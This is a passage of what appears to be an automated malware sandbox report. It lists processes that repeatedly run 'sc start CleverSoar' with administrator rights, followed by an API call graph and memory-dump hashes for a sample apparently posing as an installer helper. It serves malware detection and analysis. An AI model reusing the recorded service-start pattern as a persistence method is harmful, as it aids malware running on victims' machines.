                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:90
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:91
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:92
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:93
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:94
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:95
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:96
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:97
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:98
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:99
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:100
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:101
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:102
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:103
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:104
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:105
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:106
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:107
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:108
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:109
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:110
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true


                                Execution Graph

                                Execution Coverage:2.3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:15.5%
                                Total number of Nodes:818
                                Total number of Limit Nodes:9
66498->66430 66499->66426 66500->66431 66501->66432 66503 6ca215a2 __wsopen_s 18 API calls 66502->66503 66505 6ca1b935 66503->66505 66504 6ca1b93b 66506 6ca2171f __wsopen_s SetStdHandle 66504->66506 66505->66504 66507 6ca1b96d 66505->66507 66509 6ca215a2 __wsopen_s 18 API calls 66505->66509 66514 6ca1b993 __dosmaperr 66506->66514 66507->66504 66508 6ca215a2 __wsopen_s 18 API calls 66507->66508 66511 6ca1b979 CloseHandle 66508->66511 66510 6ca1b964 66509->66510 66512 6ca215a2 __wsopen_s 18 API calls 66510->66512 66511->66504 66513 6ca1b985 GetLastError 66511->66513 66512->66507 66513->66504 66514->66418 66515->66435 66516->66441 66517->66428 66518->66317 66520 6ca10ba9 66519->66520 66521 6ca10bbe 66519->66521 66557 6ca10120 18 API calls __cftoe 66520->66557 66531 6ca10bb9 66521->66531 66535 6ca10cb9 66521->66535 66528 6ca10be1 66550 6ca1b898 66528->66550 66530 6ca10be7 66530->66531 66558 6ca147bb HeapFree GetLastError __dosmaperr 66530->66558 66531->66320 66533->66321 66534->66321 66536 6ca10cd1 66535->66536 66540 6ca10bd3 66535->66540 66537 6ca19c60 18 API calls 66536->66537 66536->66540 66538 6ca10cef 66537->66538 66559 6ca1bb6c 66538->66559 66541 6ca1873e 66540->66541 66542 6ca18755 66541->66542 66543 6ca10bdb 66541->66543 66542->66543 66642 6ca147bb HeapFree GetLastError __dosmaperr 66542->66642 66545 6ca19c60 66543->66545 66546 6ca19c81 66545->66546 66547 6ca19c6c 66545->66547 66546->66528 66643 6ca10120 18 API calls __cftoe 66547->66643 66549 6ca19c7c 66549->66528 66551 6ca1b8be 66550->66551 66552 6ca1b8a9 __dosmaperr 66550->66552 66553 6ca1b8e5 66551->66553 66554 6ca1b907 __dosmaperr 66551->66554 66552->66530 66644 6ca1b9c1 66553->66644 66652 6ca10120 18 API calls __cftoe 66554->66652 66557->66531 66558->66531 66560 6ca1bb78 __wsopen_s 66559->66560 66561 6ca1bb80 __dosmaperr 66560->66561 66562 6ca1bbca 66560->66562 66564 6ca1bc33 __dosmaperr 66560->66564 66561->66540 66570 6ca21990 EnterCriticalSection 66562->66570 66600 6ca10120 18 API calls __cftoe 
66564->66600 66565 6ca1bbd0 66566 6ca1bbec __dosmaperr 66565->66566 66571 6ca1bc5e 66565->66571 66599 6ca1bc2b LeaveCriticalSection __wsopen_s 66566->66599 66570->66565 66572 6ca1bc80 66571->66572 66595 6ca1bc9c __dosmaperr 66571->66595 66573 6ca1bcd4 66572->66573 66575 6ca1bc84 __dosmaperr 66572->66575 66574 6ca1bce7 66573->66574 66609 6ca1ac69 20 API calls __wsopen_s 66573->66609 66601 6ca1be40 66574->66601 66608 6ca10120 18 API calls __cftoe 66575->66608 66580 6ca1bcfd 66584 6ca1bd01 66580->66584 66585 6ca1bd26 66580->66585 66581 6ca1bd3c 66582 6ca1bd50 66581->66582 66583 6ca1bd95 WriteFile 66581->66583 66588 6ca1bd85 66582->66588 66589 6ca1bd5b 66582->66589 66586 6ca1bdb9 GetLastError 66583->66586 66583->66595 66584->66595 66610 6ca1c25b 6 API calls __wsopen_s 66584->66610 66611 6ca1beb1 43 API calls 5 library calls 66585->66611 66586->66595 66614 6ca1c2c3 7 API calls 2 library calls 66588->66614 66590 6ca1bd60 66589->66590 66591 6ca1bd75 66589->66591 66590->66595 66596 6ca1bd65 66590->66596 66613 6ca1c487 8 API calls 3 library calls 66591->66613 66594 6ca1bd73 66594->66595 66595->66566 66612 6ca1c39e 7 API calls 2 library calls 66596->66612 66599->66561 66600->66561 66602 6ca219e5 __wsopen_s 18 API calls 66601->66602 66603 6ca1be51 66602->66603 66607 6ca1bcf8 66603->66607 66615 6ca149b2 GetLastError 66603->66615 66606 6ca1be8e GetConsoleMode 66606->66607 66607->66580 66607->66581 66608->66595 66609->66574 66610->66595 66611->66595 66612->66594 66613->66594 66614->66594 66616 6ca149c9 66615->66616 66620 6ca149cf 66615->66620 66617 6ca16b23 __Getctype 6 API calls 66616->66617 66617->66620 66618 6ca16b62 __Getctype 6 API calls 66619 6ca149ed 66618->66619 66621 6ca149d5 SetLastError 66619->66621 66622 6ca149f1 66619->66622 66620->66618 66620->66621 66626 6ca14a63 66621->66626 66627 6ca14a69 66621->66627 66623 6ca171e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 66622->66623 66625 6ca149fd 66623->66625 66628 6ca14a05 66625->66628 66629 6ca14a1c 
66625->66629 66626->66606 66626->66607 66630 6ca10ac9 __Getctype 35 API calls 66627->66630 66632 6ca16b62 __Getctype 6 API calls 66628->66632 66631 6ca16b62 __Getctype 6 API calls 66629->66631 66633 6ca14a6e 66630->66633 66634 6ca14a28 66631->66634 66635 6ca14a13 66632->66635 66636 6ca14a3d 66634->66636 66637 6ca14a2c 66634->66637 66638 6ca147bb _free HeapFree GetLastError 66635->66638 66641 6ca147bb _free HeapFree GetLastError 66636->66641 66639 6ca16b62 __Getctype 6 API calls 66637->66639 66640 6ca14a19 66638->66640 66639->66635 66640->66621 66641->66640 66642->66543 66643->66549 66645 6ca1b9cd __wsopen_s 66644->66645 66653 6ca21990 EnterCriticalSection 66645->66653 66647 6ca1b9db 66648 6ca1ba08 66647->66648 66649 6ca1b925 __wsopen_s 21 API calls 66647->66649 66654 6ca1ba41 LeaveCriticalSection __wsopen_s 66648->66654 66649->66648 66651 6ca1ba2a 66651->66552 66652->66552 66653->66647 66654->66651 66655->66150 66656->66156 66657->66150 66658->66150 66659->66150 66661 6c8d022e 66660->66661 66662 6c8a70c4 66661->66662 66667 6ca117db 66661->66667 66662->66165 66664->66167 66665->66169 66666->66171 66668 6ca11806 66667->66668 66669 6ca117e9 66667->66669 66668->66661 66669->66668 66670 6ca1180a 66669->66670 66672 6ca117f6 66669->66672 66675 6ca11a02 66670->66675 66683 6ca10120 18 API calls __cftoe 66672->66683 66676 6ca11a0e __wsopen_s 66675->66676 66684 6ca0c5a9 EnterCriticalSection 66676->66684 66678 6ca11a1c 66685 6ca119bf 66678->66685 66682 6ca1183c 66682->66661 66683->66668 66684->66678 66693 6ca185a6 66685->66693 66691 6ca119f9 66692 6ca11a51 LeaveCriticalSection 66691->66692 66692->66682 66694 6ca19c60 18 API calls 66693->66694 66695 6ca185b7 66694->66695 66696 6ca219e5 __wsopen_s 18 API calls 66695->66696 66697 6ca185bd __wsopen_s 66696->66697 66699 6ca119d3 66697->66699 66710 6ca147bb HeapFree GetLastError __dosmaperr 66697->66710 66700 6ca1183e 66699->66700 66702 6ca11850 66700->66702 66704 6ca1186e 66700->66704 66701 6ca1185e 66711 6ca10120 18 API calls 
__cftoe 66701->66711 66702->66701 66702->66704 66708 6ca11886 _Yarn 66702->66708 66709 6ca18659 62 API calls 66704->66709 66705 6ca10cb9 62 API calls 66705->66708 66706 6ca19c60 18 API calls 66706->66708 66707 6ca1bb6c __wsopen_s 62 API calls 66707->66708 66708->66704 66708->66705 66708->66706 66708->66707 66709->66691 66710->66699 66711->66704 66713 6ca06025 66712->66713 66714 6c8d2020 52 API calls 66713->66714 66715 6ca060c6 66714->66715 66716 6ca06a43 std::_Facet_Register 4 API calls 66715->66716 66717 6ca060fe 66716->66717 66718 6ca07327 43 API calls 66717->66718 66719 6ca06112 66718->66719 66720 6c8d1d90 89 API calls 66719->66720 66722 6ca061bb 66720->66722 66721 6ca061ec 66721->66187 66722->66721 66764 6c8d2250 30 API calls 66722->66764 66724 6ca06226 66765 6c8d26e0 24 API calls 4 library calls 66724->66765 66726 6ca06238 66766 6ca09379 RaiseException 66726->66766 66728 6ca0624d 66729 6c8ce010 67 API calls 66728->66729 66730 6ca0625f 66729->66730 66730->66187 66732 6ca0638d 66731->66732 66767 6ca065a0 66732->66767 66734 6ca063a5 66736 6ca0647c 66734->66736 66785 6c8d2250 30 API calls 66734->66785 66786 6c8d26e0 24 API calls 4 library calls 66734->66786 66787 6ca09379 RaiseException 66734->66787 66736->66192 66740 6c8e203f 66739->66740 66747 6c8e2053 66740->66747 66796 6c8d3560 32 API calls std::_Xinvalid_argument 66740->66796 66743 6c8e210e 66746 6c8e2121 66743->66746 66797 6c8d37e0 32 API calls std::_Xinvalid_argument 66743->66797 66746->66192 66747->66743 66798 6c8d2250 30 API calls 66747->66798 66799 6c8d26e0 24 API calls 4 library calls 66747->66799 66800 6ca09379 RaiseException 66747->66800 66750 6ca05b9e 66749->66750 66754 6ca05bd1 66749->66754 66751 6c8d01f0 64 API calls 66750->66751 66753 6ca05bc4 66751->66753 66752 6ca05c83 66752->66198 66756 6ca10b18 67 API calls 66753->66756 66754->66752 66801 6c8d2250 30 API calls 66754->66801 66756->66754 66757 6ca05cae 66802 6c8d2340 24 API calls 66757->66802 66759 6ca05cbe 66803 6ca09379 RaiseException 
66759->66803 66761 6ca05cc9 66762 6c8ce010 67 API calls 66761->66762 66763 6ca05d22 std::ios_base::_Ios_base_dtor 66762->66763 66763->66198 66764->66724 66765->66726 66766->66728 66768 6ca06608 66767->66768 66769 6ca065dc 66767->66769 66772 6ca06619 66768->66772 66788 6c8d3560 32 API calls std::_Xinvalid_argument 66768->66788 66770 6ca06601 66769->66770 66790 6c8d2250 30 API calls 66769->66790 66770->66734 66772->66770 66789 6c8d2f60 42 API calls 4 library calls 66772->66789 66774 6ca067e8 66791 6c8d2340 24 API calls 66774->66791 66776 6ca067f7 66792 6ca09379 RaiseException 66776->66792 66780 6ca06827 66794 6c8d2340 24 API calls 66780->66794 66782 6ca0683d 66795 6ca09379 RaiseException 66782->66795 66784 6ca06653 66784->66770 66793 6c8d2250 30 API calls 66784->66793 66785->66734 66786->66734 66787->66734 66788->66772 66789->66784 66790->66774 66791->66776 66792->66784 66793->66780 66794->66782 66795->66770 66796->66747 66797->66746 66798->66747 66799->66747 66800->66747 66801->66757 66802->66759 66803->66761 66804 6c894a27 66805 6c894a5d _strlen 66804->66805 66806 6c8a639e 66805->66806 66807 6c895b58 66805->66807 66808 6c895b6f 66805->66808 66812 6c895b09 _Yarn 66805->66812 66895 6ca10130 18 API calls 2 library calls 66806->66895 66810 6ca06a43 std::_Facet_Register 4 API calls 66807->66810 66811 6ca06a43 std::_Facet_Register 4 API calls 66808->66811 66810->66812 66811->66812 66813 6c9faec0 2 API calls 66812->66813 66815 6c895bad std::ios_base::_Ios_base_dtor 66813->66815 66814 6ca04ff0 4 API calls 66824 6c8961cb _strlen 66814->66824 66815->66806 66815->66814 66819 6c899ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66815->66819 66816 6ca06a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66816->66819 66817 6c9faec0 2 API calls 66817->66819 66818 6c89a292 Sleep 66894 6c899bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 66818->66894 66819->66806 66819->66816 66819->66817 66819->66818 66838 6c89e619 
66819->66838 66820 6c89660d 66822 6ca06a43 std::_Facet_Register 4 API calls 66820->66822 66821 6c896624 66823 6ca06a43 std::_Facet_Register 4 API calls 66821->66823 66832 6c8965bc _Yarn _strlen 66822->66832 66823->66832 66824->66806 66824->66820 66824->66821 66824->66832 66825 6ca04ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 66825->66894 66826 6c899bbd GetCurrentProcess TerminateProcess 66826->66819 66827 6c8a63b2 66896 6c8815e0 18 API calls std::ios_base::_Ios_base_dtor 66827->66896 66829 6c8a64f8 66830 6c896989 66834 6ca06a43 std::_Facet_Register 4 API calls 66830->66834 66831 6c896970 66833 6ca06a43 std::_Facet_Register 4 API calls 66831->66833 66832->66827 66832->66830 66832->66831 66835 6c896920 _Yarn 66832->66835 66833->66835 66834->66835 66836 6ca05960 104 API calls 66835->66836 66839 6c8969d6 std::ios_base::_Ios_base_dtor _strlen 66836->66839 66837 6c89f243 CreateFileA 66853 6c89f2a7 66837->66853 66838->66837 66839->66806 66840 6c896dbb 66839->66840 66841 6c896dd2 66839->66841 66852 6c896d69 _Yarn _strlen 66839->66852 66842 6ca06a43 std::_Facet_Register 4 API calls 66840->66842 66843 6ca06a43 std::_Facet_Register 4 API calls 66841->66843 66842->66852 66843->66852 66844 6c8a02ca 66845 6c897440 66847 6ca06a43 std::_Facet_Register 4 API calls 66845->66847 66846 6c897427 66848 6ca06a43 std::_Facet_Register 4 API calls 66846->66848 66849 6c8973da _Yarn 66847->66849 66848->66849 66850 6ca05960 104 API calls 66849->66850 66854 6c89748d std::ios_base::_Ios_base_dtor _strlen 66850->66854 66851 6c8a02ac GetCurrentProcess TerminateProcess 66851->66844 66852->66827 66852->66845 66852->66846 66852->66849 66853->66844 66853->66851 66854->66806 66855 6c8979a8 66854->66855 66856 6c897991 66854->66856 66863 6c897940 _Yarn _strlen 66854->66863 66858 6ca06a43 std::_Facet_Register 4 API calls 66855->66858 66857 6ca06a43 std::_Facet_Register 4 API calls 66856->66857 66857->66863 66858->66863 66859 6c897dc9 66861 6ca06a43 std::_Facet_Register 4 API calls 
66859->66861 66860 6c897de2 66862 6ca06a43 std::_Facet_Register 4 API calls 66860->66862 66864 6c897d7c _Yarn 66861->66864 66862->66864 66863->66827 66863->66859 66863->66860 66863->66864 66865 6ca05960 104 API calls 66864->66865 66867 6c897e2f std::ios_base::_Ios_base_dtor _strlen 66865->66867 66866 6ca06a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66866->66894 66867->66806 66868 6c8985a8 66867->66868 66869 6c8985bf 66867->66869 66877 6c898556 _Yarn _strlen 66867->66877 66870 6ca06a43 std::_Facet_Register 4 API calls 66868->66870 66871 6ca06a43 std::_Facet_Register 4 API calls 66869->66871 66870->66877 66871->66877 66872 6c89896a 66874 6ca06a43 std::_Facet_Register 4 API calls 66872->66874 66873 6c898983 66875 6ca06a43 std::_Facet_Register 4 API calls 66873->66875 66876 6c89891d _Yarn 66874->66876 66875->66876 66878 6ca05960 104 API calls 66876->66878 66877->66827 66877->66872 66877->66873 66877->66876 66879 6c8989d0 std::ios_base::_Ios_base_dtor _strlen 66878->66879 66879->66806 66880 6c898f1f 66879->66880 66881 6c898f36 66879->66881 66885 6c898ecd _Yarn _strlen 66879->66885 66882 6ca06a43 std::_Facet_Register 4 API calls 66880->66882 66883 6ca06a43 std::_Facet_Register 4 API calls 66881->66883 66882->66885 66883->66885 66884 6ca05960 104 API calls 66884->66894 66885->66827 66886 6c89936d 66885->66886 66887 6c899354 66885->66887 66890 6c899307 _Yarn 66885->66890 66889 6ca06a43 std::_Facet_Register 4 API calls 66886->66889 66888 6ca06a43 std::_Facet_Register 4 API calls 66887->66888 66888->66890 66889->66890 66891 6ca05960 104 API calls 66890->66891 66893 6c8993ba std::ios_base::_Ios_base_dtor 66891->66893 66892 6ca04ff0 4 API calls 66892->66819 66893->66806 66893->66892 66894->66806 66894->66819 66894->66825 66894->66826 66894->66827 66894->66866 66894->66884 66896->66829 66897 6ca0ef3f 66898 6ca0ef4b __wsopen_s 66897->66898 66899 6ca0ef52 GetLastError ExitThread 66898->66899 66900 6ca0ef5f 
66898->66900 66901 6ca149b2 __Getctype 37 API calls 66900->66901 66902 6ca0ef64 66901->66902 66909 6ca19d66 66902->66909 66905 6ca0ef7b 66915 6ca0eeaa 16 API calls 2 library calls 66905->66915 66908 6ca0ef9d 66910 6ca19d78 GetPEB 66909->66910 66912 6ca0ef6f 66909->66912 66911 6ca19d8b 66910->66911 66910->66912 66916 6ca16e18 5 API calls std::_Lockit::_Lockit 66911->66916 66912->66905 66914 6ca16d6f 5 API calls std::_Lockit::_Lockit 66912->66914 66914->66905 66915->66908 66916->66912
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: HR^
                                • API String ID: 4218353326-1341859651
                                • Opcode ID: 783aff88c1bad04fc4f5f20d3f93a815b58186c1e1175d4f2992a5da97989f90
                                • Instruction ID: 7e856272003e50b2e18ec5daffb84ec278e64a44e4ec7035a0e27dc82f69ad4d
                                • Opcode Fuzzy Hash: 783aff88c1bad04fc4f5f20d3f93a815b58186c1e1175d4f2992a5da97989f90
                                • Instruction Fuzzy Hash: DD74F471645B028FC738CF28C9D0695B7F3AF95318B198E2DC0A68BE95E774B54ACB40
                                Strings
                                Similarity
                                • API ID:
                                • String ID: }jk$;T55$L@^
                                • API String ID: 0-4218709813
                                • Opcode ID: 314b12dda0d3f4594be8097b71436929e3ecc16aa8b726fdb8c2c5fcd0a65d8b
                                • Instruction ID: 77f1d53691e50a7fe10cf2794f18b318d226cd32cb4b8e2dd9ccce4ed379891d
                                • Opcode Fuzzy Hash: 314b12dda0d3f4594be8097b71436929e3ecc16aa8b726fdb8c2c5fcd0a65d8b
                                • Instruction Fuzzy Hash: B1340571645B018FC738CF2CC9D0A96B7E3EF95318B198E6DC0AA4BA55E734B54ACB40
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA0524E
                                Similarity
                                • API ID: CreateSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3332741929-0
                                • Opcode ID: 4c993e1827aaaacf8905426b3a78b5ed967c9b6e6df917e0a69fa5c87693f0a6
                                • Instruction ID: a1a15d801e20ee19c29c705c28b3509f4c4d9c60b598e1ed3af101d45c5ea0c2
                                • Opcode Fuzzy Hash: 4c993e1827aaaacf8905426b3a78b5ed967c9b6e6df917e0a69fa5c87693f0a6
                                • Instruction Fuzzy Hash: 37315C747083009FD7109F28E888B0ABBF4AF9A788F54492EE498C7360D771D8888F57
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb17ca5915741ba5ff66a79ad32258ba904c0ca3c9249261eb59741a8235bd26
                                • Instruction ID: bf3516fd04d323937fb0557788bc20f21e9b5cbeec297bb78cc3d390802de950
                                • Opcode Fuzzy Hash: eb17ca5915741ba5ff66a79ad32258ba904c0ca3c9249261eb59741a8235bd26
                                • Instruction Fuzzy Hash: 5732B132246B018FC334CF28C990696B7E3EFD131476A8E6DC0AA5BE55D775B84ACB50
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: 22496e597871edaeb170921646d8ec428c80d212556bb01f350a632f7f15cfa3
                                • Instruction ID: c21962c0f0a6600fc6083fc59e62e79b3d70536324f8ebed65e37f5d182f1a9e
                                • Opcode Fuzzy Hash: 22496e597871edaeb170921646d8ec428c80d212556bb01f350a632f7f15cfa3
                                • Instruction Fuzzy Hash: 6151D132106B018FC3308F28C580785B7A3BFE2314F6A8E5DC0E61BE95DB74B9468B91
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
